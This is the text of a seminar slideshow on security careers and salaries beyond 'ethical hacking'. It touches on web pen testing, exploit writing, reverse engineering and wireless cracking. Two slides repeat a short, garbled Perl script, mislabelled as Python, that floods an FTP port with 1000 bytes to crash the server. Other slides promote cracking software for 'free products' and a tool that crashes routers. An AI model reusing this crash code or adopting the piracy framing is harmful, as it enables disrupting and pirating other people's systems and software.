Presentation on topics beyond the conventional ethical hacking , discusses job factors and scope in the security field :) this was presented in LPU (Lovely Professional University) as a Seminar with attendees over 200. Meet m e at FB if u want it fb/nipun.jaswal
3. Lil About My Self
Certified With C|EH , CISE , AFCEH
Associated With over 9 Companies
Ambassador , EC-COUNCIL
Creator Of India’s Fist DLP on
Web Application Penetration Testing Course
Student @ LPU
Tested Over 90+ Servers
Currently working as Chief Security Analyst at
HCF Infosec Pvt. Ltd
4. Lets Go Old School ,What is Ethical
Hacking?
Breaking Into Devices , Networks
Legally.
Securing Servers, Recovering
Emails etc.
But the Question Remains !
Where to get these jobs ?
6. Why More Jobs and Less People ?
Emerging Technology
Still Register Work
Don’t want to spend money
Find it too difficult
People Feel they can learn hacking
in 2 days workshop :-P
No Proper facilities of required
courses
7. Salary Packages
Normal B.tech : 300K-400K
BPO : 100K-250K
DEVELOPMENT : 300K-700K
SECURITY : 600K-1300K
8. Beyond So Called “Ethical Hacking”
Web Application Penetration
testing
Exploit Writing
Reverse Engineering
Malware Analysis
Computer Forensics
Protocol Analysis
9. Why To Go Beyond Ethical Hacking?
Jobs For Ethical Hacker:-
Trainer
Trainer
Trainer
Trainer
And Trainer
Salary Around : 15K + Incentives
10. Jobs Beyond Ethical Hacking:-
Jobs For Hackers:-
Researchers
Technical Heads
Penetration testers
Forensic Investigators
Salary Around: 300-400K Per
Month
12. Benefits of Being a Hacker
I M UR WORST NIGHTMARE :-P
13. How To Let Your Dreams Come True?
Some Highly Paid Fields :-
WAPT – Involves Testing of Web
Applications , Websites , Servers ,
Source code Auditing .
Exploit Writing – Finding Vulnerabilities
in soft wares and Possibly to Exploit the
Software .
Reverse Engineering :- Software
cracking , Patches , Modifying Features
of an end product
14. How To Let Your Dreams Come True?
Some Highly Paid Fields :-
Wireless Testing :- Involves Network
Security infrastructure build up ,
Managing Networks , System
Administration etc.
Projects :- Good At Coding? Show to
the whole world .
Forensics : Highest Paid Job in the
entire list Takes A lot , And Pays A
lot
15. Why We Need More People ?
Source: Indian Express
16. Why We Need More People ?
Source: Times Of India
23. Now Beyond The Word ‘Ethical’
Web Application Penetration Testing :-
• Find Bugs In Web Applications – Custom Made ,
Open Source Applications .
• Bugs which may compromise the security , make it
vulnerable , helps an attacker to steal sensitive
information
• Now How To Perform 1 Out of 300 Tests In Web
Applications Pen- Test?
• Lets See a Simple Example – SQL Injection Bypass
26. Now Beyond The Word ‘Ethical’
Exploit Writing
• Potentially writing codes to exploit a
vulnerability .
• Highly Paid in Soft wares are vulnerable to
Exploits , which further may lead to
compromise of the entire system.
• Requirement : C,C++, Perl , Python , Ruby ,
Assembly language
27. Now Beyond The Word ‘Ethical’
Simplest of The Exploit in Python- Crashing A Secure Port FTP
Server
use strict;
use Socket;
my $junk = "x41" x1000;
my $host = shift || ‘192.168.15.1';
my $port = shift || 200;
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
print "[+] Setting up socketn";
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $portn";
connect(SOCKET, $paddr) or die "connect: $!";
print "[+] Sending payloadn";
print SOCKET $junk."n";
print "[+] Payload sentn";
close SOCKET or die "close: $!";
28. Now Beyond The Word ‘Ethical’
Simplest of The Exploit in Python- Crashing A Secure Port FTP
Server
use strict;
use Socket;
my $junk = "x41" x1000;
my $host = shift || ‘192.168.15.1';
my $port = shift || 200;
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
print "[+] Setting up socketn";
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $portn";
connect(SOCKET, $paddr) or die "connect: $!";
print "[+] Sending payloadn";
print SOCKET $junk."n";
print "[+] Payload sentn";
close SOCKET or die "close: $!";
29. Now Beyond The Word ‘Ethical’
Prices for Various Exploits
30. Now Beyond The Word ‘Ethical’
Reverse Engineering
• Editing the final software to find serials keys ,
stop the online authentications ,
• Mostly used by pirates
• Sometimes used to edit the features of a final
software
• Make your Life easier with free products
31. Now Beyond The Word ‘Ethical’
Wireless Penetration Testing
• Involves Auditing of Network Security Over
Wireless
• Installation of Servers And Security Devices
• Crack proofing Wireless Passwords
• Highly paid
• Requires Networking Background
32. INSANITY WIFI CRACKER
Insanity Wi-fi Cracker
• Developed By me and my Friends for minor
project
• Automates the cracking of various wifi securities
• Performs self MITM attack
• DOS Service Can Crash the Routers For Ever :-P
• Even an 8 Years old can press the button ‘c’ for
cracking and no. for a particular AP to crack